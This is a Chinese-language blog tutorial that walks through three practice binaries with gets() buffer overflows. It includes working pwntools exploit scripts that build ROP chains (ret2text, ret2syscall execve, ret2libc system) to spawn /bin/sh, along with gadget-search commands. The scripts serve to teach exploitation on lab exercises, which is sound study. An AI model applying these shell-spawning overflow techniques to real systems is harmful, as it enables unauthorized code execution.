<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="Gonglong Chen">



<meta name="description" content="最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候，我们不能够直接将shellcode覆盖到堆栈中执行，而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets，如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn">
<meta name="keywords" content="linux-pwn,ret2libc,ret2shellcode,ret2syscall">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux PWN从入门到熟练">
<meta property="og:url" content="http://yoursite.com/2018/11/18/linx-pwn-basic-rop/index.html">
<meta property="og:site_name" content="Gonglong Chen">
<meta property="og:description" content="最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候，我们不能够直接将shellcode覆盖到堆栈中执行，而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets，如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01a969a8d998ad5508.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t0121b7d0ee7097d3eb.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t017765027ec37e9b7c.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t019135666bcac95c40.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01f62cb32cd2de8ccf.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t01ab05a78beb085393.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t01073c1846a0bdd522.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t01a2954c8acc903c45.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t014afe6249aaf19f39.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t01b465e29406fb5885.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t012d4b6a5f878ce61a.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t0116c74eb7aafa63a1.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t01dd03e7b469bb1156.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t0124ce43c2ac1298f1.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t01b763b85277c1c5a1.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t012412643f0d787ed8.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t0122f7304be227db6a.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t0130eabe3693ff95d5.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t019e4fbd3cfc22b528.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t016fc215018648deb7.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t015a6b10450db9be72.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t017821bddc8db5907c.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01fa2ec9813d21c38e.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t014a8e310b882e17c2.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t019e1160b68d494012.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t0193e51c793180a34e.png">
<meta property="og:updated_time" content="2020-08-15T01:28:56.394Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux PWN从入门到熟练">
<meta name="twitter:description" content="最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候，我们不能够直接将shellcode覆盖到堆栈中执行，而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets，如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn">
<meta name="twitter:image" content="https://p0.ssl.qhimg.com/t01a969a8d998ad5508.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Gonglong Chen" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">





    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">





<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>Linux PWN从入门到熟练 | Gonglong Chen</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: false,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>







  <!--prettify代码高亮主题css引入-->
  <link href="/plugins/prettify/themes/atelier-lakeside-dark.css" rel="stylesheet">



</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/head.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Gonglong Chen</a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="">
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class="no-result">No results found <i class="fa fa-spinner fa-pulse"></i></p>
        


        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">blogs</a></li>
                        
                            <li><a href="/tags/">Tages</a></li>
                        
                            <li><a href="/about/">Aboutme</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 新浪微博" href="https://weibo.com/u/2618063075" title="新浪微博"></a>
                            
                                <a class="fa GitHub" href="https://github.com/desword" title="GitHub"></a>
                            
                                <a class="fa anquank" href="https://www.anquanke.com/member/122056" title="anquank"></a>
                            
                                <a class="fa CSDN" href="https://blog.csdn.net/ls1160" title="CSDN"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Gonglong Chen</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/head.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Gonglong Chen</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">blogs</a></li>
                
                    <li><a href="/tags/">Tages</a></li>
                
                    <li><a href="/about/">Aboutme</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 新浪微博" target="_blank" href="https://weibo.com/u/2618063075" title="新浪微博"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/desword" title="GitHub"></a>
                            
                                <a class="fa anquank" target="_blank" href="https://www.anquanke.com/member/122056" title="anquank"></a>
                            
                                <a class="fa CSDN" target="_blank" href="https://blog.csdn.net/ls1160" title="CSDN"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me">
</nav>
      <div class="body-wrap"><article id="post-linx-pwn-basic-rop" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2018/11/18/linx-pwn-basic-rop/" class="article-date">
      <time datetime="2018-11-17T18:56:32.000Z" itemprop="datePublished">2018-11-18</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Linux PWN从入门到熟练
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/linux-pwn/">linux-pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2libc/">ret2libc</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2shellcode/">ret2shellcode</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2syscall/">ret2syscall</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p><img src="https://p0.ssl.qhimg.com/t01a969a8d998ad5508.png" alt=""></p>
<p>最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候，我们不能够直接将shellcode覆盖到堆栈中执行，而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets，如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。</p>
<a id="more"></a>
<h2 id="第一关"><a href="#第一关" class="headerlink" title="第一关"></a>第一关</h2><p>第一关的gadgets较为简单，包含了一个直接可以利用的，可返回shell的函数。我们只要计算好覆盖的偏移，将可返回shell函数的地址覆盖到相应的位置即可以。程序下载：<a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop/pwn1" target="_blank" rel="noopener">Pwn1</a></p>
<p>我们首先来查看一下该程序的保护情况，发现开启了堆栈保护。即NX enabled。且是32bit的程序。因此需要在32位的linux环境下测试。</p>
<p><img src="https://p4.ssl.qhimg.com/t0121b7d0ee7097d3eb.png" alt=""></p>
<p>这里涉及到一个工具，<a href="https://github.com/slimm609/checksec.sh" target="_blank" rel="noopener">chechsec</a>。该工具专门用来检测程序中受保护的情况，我们可以根据程序受保护的情况来选择对应的pwn策略。<br>下载以后，直接在命令行中建立符号链接就可以在terminal中直接使用了</p>
<pre><code>sudo ln –sf checksec /usr/bin/checksec
</code></pre><p>接下来我们利用IDA查看一下程序的源代码：<br><img src="https://p4.ssl.qhimg.com/t017765027ec37e9b7c.png" alt=""><br><img src="https://p5.ssl.qhimg.com/t019135666bcac95c40.png" alt=""></p>
<p>可以发现漏洞出现在gets里面，gets函数存在缓冲区溢出漏洞，我们可以通过超长的字符串来覆盖缓冲区，从而修改ROP。为了达到这个目的，我们需要首先计算，输入的&amp;s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址，就是记录了返回地址的位置。在32位的程序中，就是ebp+4。其中，Esp是栈顶指针，ebp是栈底指针。Esp -&gt; ebp,  地址从小到大。小地址栈顶，大地址栈底。</p>
<p>我们有两种方法可以得到s距离返回地址的偏移：徒手计算和利用patternoffset产生字符串。</p>
<p>首先第一种方法，徒手计算。我们利用gdb的辅助工具gef来辅助查看esp地址。<br>注意，这里需要按照这个辅助工具，<a href="https://github.com/hugsy/gef" target="_blank" rel="noopener">gef</a>，该工具会提供更加丰富的调试信息。包括堆栈信息，寄存器信息等。按照完毕之后，使用gdb –q *.elf执行就可以。<br>启动的程序之后，我们在上述get函数的位置下断点，即0x080486AE<br><img src="https://p0.ssl.qhimg.com/t01f62cb32cd2de8ccf.png" alt=""></p>
<p><img src="https://p2.ssl.qhimg.com/t01ab05a78beb085393.png" alt=""></p>
<p>可以看到 esp 为 0xbfffeed0，ebp为0xbfffef58，同时 s 相对于 esp 的索引为[esp+80h-64h]= [esp+0x1c]。所以s的地址为 0xbfffeeec，所以 s 相对于 ebp 的偏移为 0x6C（108），所以相对于返回地址的偏移为 0x6c+4（112）。</p>
<p>另外一种方法是利用patternoffset执行来计算。借助到这个工具<a href="https://github.com/desword/shellcode_tools" target="_blank" rel="noopener">patternoffset</a>。下载下来直接作为python脚本使用。利用下面的命令产生字符串到test的文件中：</p>
<pre><code>python patternLocOffset.py -c -l 700 -f test
</code></pre><p>接着远程IDA挂载调试，在程序的返回位置下断点，即retn的位置。</p>
<p><img src="https://p3.ssl.qhimg.com/t01073c1846a0bdd522.png" alt=""><br>它会在远程的服务器端等待我的输入</p>
<pre><code>~/ $ ./linux_server 
IDA Linux 32-bit remote debug server(ST) v1.22. Hex-Rays (c) 2004-2017
Listening on 0.0.0.0:23946...
=========================================================
[1] Accepting connection from 192.168.110.1...
There is something amazing here, do you know anything?
</code></pre><p>在这个位置，我就把产生的pattern计算字符串复制进去。（注意，如果这里始终没有让程序停下来让你输入对应的字符串进去的话，就断开ubuntu的server，然后重新连接一下，就会停下来等待我们的字符串输入）</p>
<p>接着，查看程序覆盖的寄存器ebp的内容为0x41366441</p>
<p><img src="https://p1.ssl.qhimg.com/t01a2954c8acc903c45.png" alt=""></p>
<p>再利用offset的脚本计算一下输入的缓冲区地址距离ESP相差多少的字节，相差的是108个字节。ESP之后，存储的就是返回的地址，所以要加上108+4=112字节的偏移。</p>
<p><img src="https://p2.ssl.qhimg.com/t014afe6249aaf19f39.png" alt=""></p>
<p>得到的结果和上面是一致的。</p>
<p>接下来，我们需要找到可以利用的系统调用函数。在IDA中搜索（alt+T）可以利用来的系统sh调用函数：<br><img src="https://p3.ssl.qhimg.com/t01b465e29406fb5885.png" alt=""><br>最后，将需要覆盖的地址0x0804863A填入指定的位置覆盖，在利用pwntools来验证攻击。这里利用到了一个<a href="https://github.com/Gallopsled/pwntools" target="_blank" rel="noopener">pwntools</a>工具。推荐使用基于源代码的安装方式，可以更为方便。</p>
<p>安装方式为：</p>
<pre><code>cd ~
git clone https://github.com/aquynh/capstone
cd capstone
make
make install
cd ~
git clone https://github.com/Gallopsled/pwntools
cd pwntools
python setup.py install
</code></pre><p>验证：</p>
<pre><code>&gt;&gt;&gt; import pwn
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
&gt;&gt;&gt; pwn.asm(&quot;xor eax, eax&quot;)
&#39;1\xc0&#39;
</code></pre><p>使用下面的脚本来验证攻击：</p>
<pre><code>from pwn import *
pwn1 = process(&#39;./pwn1&#39;)
sh = 0x804863a
pwn1.sendline(&#39;A&#39; * (112) + p32(target))
pwn1.interactive()
</code></pre><p><img src="https://p3.ssl.qhimg.com/t012d4b6a5f878ce61a.png" alt=""></p>
<h2 id="第二关"><a href="#第二关" class="headerlink" title="第二关"></a>第二关</h2><p>在这一关中，没有可以直接利用的system()函数让我们直接调用了。我们可以学习使用系统调用来进行操作。系统调用的背景知识在<a href="https://en.wikipedia.org/wiki/System_call" target="_blank" rel="noopener">这里</a>。<br><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop/pwn2" target="_blank" rel="noopener">Pwn2</a></p>
<p>Syscall的函数调用规范为： execve(“/bin/sh”, 0,0);<br>它对应的汇编代码为：</p>
<pre><code>pop eax,   # 系统调用号载入， execve为0xb
pop ebx,     # 第一个参数， /bin/sh的string
pop ecx,  # 第二个参数，0
pop edx, # 第三个参数，0
int 0x80,  # 执行系统调用
</code></pre><p>同样的，首先利用工具来查看程序保护情况：<br><img src="https://p3.ssl.qhimg.com/t0116c74eb7aafa63a1.png" alt=""></p>
<p>查看程序的代码，发现同样是gets造成的函数溢出。<br><img src="https://p4.ssl.qhimg.com/t01dd03e7b469bb1156.png" alt=""></p>
<p>因此我们这里需要人为的构造了。这里需要用到一个工具，来查到能够控制eax,ebx,ecx,edx。就是<a href="https://github.com/JonathanSalwan/ROPgadget" target="_blank" rel="noopener">ROPgadget</a>。下载之后，直接安装</p>
<pre><code>python setup.py install
</code></pre><p>就可以使用了。执行命令，来查找对一个的汇编指令：</p>
<pre><code>ROPgadget --binary ret2syscall --only &#39;pop|ret&#39; | grep &quot;eax&quot;
</code></pre><p>其中—binary 表示目标二进制的路径，–only 表示只显示指定的汇编语句， grep可以展示想要的寄存器。</p>
<p>针对eax选择，0x080bb196 : pop eax ; ret<br><img src="https://p2.ssl.qhimg.com/t0124ce43c2ac1298f1.png" alt=""></p>
<p>针对ebx和ecx选择，0x0806eb91 : pop ecx ; pop ebx ; ret<br><img src="https://p5.ssl.qhimg.com/t01b763b85277c1c5a1.png" alt=""></p>
<p>针对edx，选择，0x0806eb6a : pop edx ; ret<br><img src="https://p4.ssl.qhimg.com/t012412643f0d787ed8.png" alt=""></p>
<p>执行命令，筛选int 0x80的系统调用, 选择：0x08049421</p>
<pre><code>ROPgadget --binary ret2syscall --only &#39;int&#39;
</code></pre><p><img src="https://p1.ssl.qhimg.com/t0122f7304be227db6a.png" alt=""></p>
<p>执行命令，筛选字符串，得到：0x080be408</p>
<pre><code>ROPgadget --binary ret2syscall --string &#39;/bin/sh&#39;
</code></pre><p><img src="https://p1.ssl.qhimg.com/t0130eabe3693ff95d5.png" alt=""></p>
<p>这里选择的每一个gadgets都含有ret是为了能够使得程序自动持续的选择堆栈中的指令依次执行。在构造这些gadgets之前，我们通过下面的堆栈指针移动图，来分析一下eip指针的移动，以及对应获取的数据内容。ret指令可以理解成去栈顶的数据作为下次跳转的位置。即，<br>eip = [esp];<br>esp = esp+4;<br>或者简单理解成： pop eip;</p>
<p><img src="https://p2.ssl.qhimg.com/t019e4fbd3cfc22b528.png" alt=""></p>
<p>上图中，左边显示的堆栈的内容，右边是对应的代码。数字表示的是，运行到特定的汇编指令的时候，esp指针的位置。总结下来，我们通过pop指令来移动esp指针获取数据，比如字符串/bin/sh，我们通过ret指令来同样移动esp指针来获取下一条执行的命令。这样，我们就能够在不需要与堆栈中执行程序的情况下，顺利的控制程序控制流的执行。</p>
<p>最终形成的shellcode利用pwntools的代码为：</p>
<pre><code>#!/usr/bin/env python
from pwn import *

sh = process(&#39;./ret2syscall&#39;)

pop_eax_ret = 0x080bb196
pop_ecx_ebx_ret = 0x0806eb91 
pop_edx_ret = 0x0806eb6a 
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    [&#39;A&#39; * 112, pop_eax_ret, 0xb, pop_ecx_ebx_ret, 0,binsh, pop_edx_ret,0, int_0x80])
sh.sendline(payload)
sh.interactive()
</code></pre><p><img src="https://p5.ssl.qhimg.com/t016fc215018648deb7.png" alt=""></p>
<h2 id="第三关"><a href="#第三关" class="headerlink" title="第三关"></a>第三关</h2><p>这一关中，我们主要通过导入函数里面的system(“/bin/sh”)函数来完成调用。<br><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop/pwn3" target="_blank" rel="noopener">Pwn3</a></p>
<p><img src="https://p5.ssl.qhimg.com/t015a6b10450db9be72.png" alt=""><br>发现它的保护也是类似的。该程序与之前类似，都是在gets函数存在漏洞。</p>
<p>首先查找system函数是否存在，利用IDA查看。<br>查看导入函数表，发现有system的外部调用函数在列表里面，</p>
<p><img src="https://p2.ssl.qhimg.com/t017821bddc8db5907c.png" alt=""><br><img src="https://p0.ssl.qhimg.com/t01fa2ec9813d21c38e.png" alt=""></p>
<p><img src="https://p0.ssl.qhimg.com/t014a8e310b882e17c2.png" alt=""><br>从而确定地址为0x08048460。</p>
<p>在利用下面的命令查找”/bin/sh”的字符串，确定了字符串的地址为0x08048720</p>
<pre><code>ROPgadget --binary ret2libc1 --string &quot;/bin/sh&quot;
</code></pre><p><img src="https://p2.ssl.qhimg.com/t019e1160b68d494012.png" alt=""></p>
<p>那么就可以依葫芦画瓢的构造shellcode了。</p>
<pre><code>#!/usr/bin/env python
from pwn import *

sh = process(&#39;./ret2libc1&#39;)

system_plt = 0x08048460
sh_addr = 0x8048720
payload = flat([&#39;a&#39; * 112, system_plt, 0xabcdabcd, sh_addr])
sh.sendline(payload)

sh.interactive()
</code></pre><p>这里解释一下，为什么会有4个字节空余的部分。<br>这里的部分，在正常调用system函数的时候，堆栈位置的system_plt之后的内容为system函数的返回地址，在之后才是新的堆栈的栈顶位置，因此在system_plt和sh_addr之间增加了4个字符来进行填充。</p>
<p><img src="https://p4.ssl.qhimg.com/t0193e51c793180a34e.png" alt=""></p>
<p>练习题：<a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop/pwn4" target="_blank" rel="noopener">pwn4</a></p>
<p>下面留下一道题大家自己练习，该题目中，含有导入函数system()，但是没有了字符串/bin/sh，需要自己想办法获取这个字符串。</p>
<p>本文首发于安全客： <a href="https://www.anquanke.com/post/id/164530" target="_blank" rel="noopener">https://www.anquanke.com/post/id/164530</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2018/11/18/linx-pwn-basic-rop/">Linux PWN从入门到熟练</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage">Gonglong Chen</a></p>
        <p><span>Created:</span>2018-11-18, 02:56:32</p>
        <p><span>Updated:</span>2020-08-15, 09:28:56</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2018/11/18/linx-pwn-basic-rop/" title="Linux PWN从入门到熟练">http://yoursite.com/2018/11/18/linx-pwn-basic-rop/</a>
            <span class="copy-path" data-clipboard-text="From http://yoursite.com/2018/11/18/linx-pwn-basic-rop/　　By Gonglong Chen" title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2018/12/24/linux-pwn-2/">
                    Linux pwn从入门到熟练（二）
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2018/11/03/cc2650-mqtt-client-example/">
                    CC2650 launchpad + RPI + CC2650 sensor tag 构造MQTT控制蓝牙节点
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一关"><span class="toc-number">1.</span> <span class="toc-text">第一关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二关"><span class="toc-number">2.</span> <span class="toc-text">第二关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第三关"><span class="toc-number">3.</span> <span class="toc-text">第三关</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide" title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"Linux PWN从入门到熟练　| Gonglong Chen　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>






<!-- for valine comment-->

    <div id="comment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
new Valine({
    el: '#comment' ,
    notify:false, 
    verify:false, 
    appId: '5ThDnxJ9xGDRyj5a8Kq8apby-gzGzoHsz',
    appKey: 'SmwcB7E7gWXRWaBth0Em9cV8',
    placeholder: 'Welcome to comments',
    avatar:'mm' 
});
</script>

    



    







    <div class="scroll" id="post-nav-button">
        
            <a href="/2018/12/24/linux-pwn-2/" title="Pre: Linux pwn从入门到熟练（二）">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2018/11/03/cc2650-mqtt-client-example/" title="Next: CC2650 launchpad + RPI + CC2650 sensor tag 构造MQTT控制蓝牙节点">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/01/08/inforsec20-day2/">InforSec 2020 网络空间安全国际学术成果分享（上） Day Two</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/08/infosec-20/">InforSec 2020 网络空间安全国际学术成果分享（上） Day One</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/29/linux-pwn-basic-3/">Linux pwn从入门到熟练（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/22/lora-error-packet-modify/">修改某款lora固件库以支持接收错误数据包</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/24/linux-pwn-2/">Linux pwn从入门到熟练（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/18/linx-pwn-basic-rop/">Linux PWN从入门到熟练</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/03/cc2650-mqtt-client-example/">CC2650 launchpad + RPI + CC2650 sensor tag 构造MQTT控制蓝牙节点</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/01/fuzzer_simple_survey/">漏洞挖掘之乱拳打死老师傅——Fuzzer</a></li></ul>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">


        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2018-2020 Gonglong Chen
            </div>


            <div class="footer-right">

<!--
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
-->

<!-- hitwebcounter Code START 
<a href="http://www.hitwebcounter.com" target="_blank">
<img src="http://hitwebcounter.com/counter/counter.php?page=6974923&style=0025&nbdigits=5&type=page&initCount=0" title="website counter" Alt="website counter"   border="0" align="up" >
</a> 
-->

<a href="https://clustrmaps.com/site/1aae7" title="Visit tracker"><img src="//clustrmaps.com/map_v2.png?cl=ffffff&w=a&t=tt&d=_A6aIN1PIjxyWChOHfot_6QWJTyXak5ICsMT6_Cye6I&co=2d78ad&ct=ffffff"></a>


            </div>



        </div>





<!--
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        

-->

    </div>
</footer>


    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 3;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
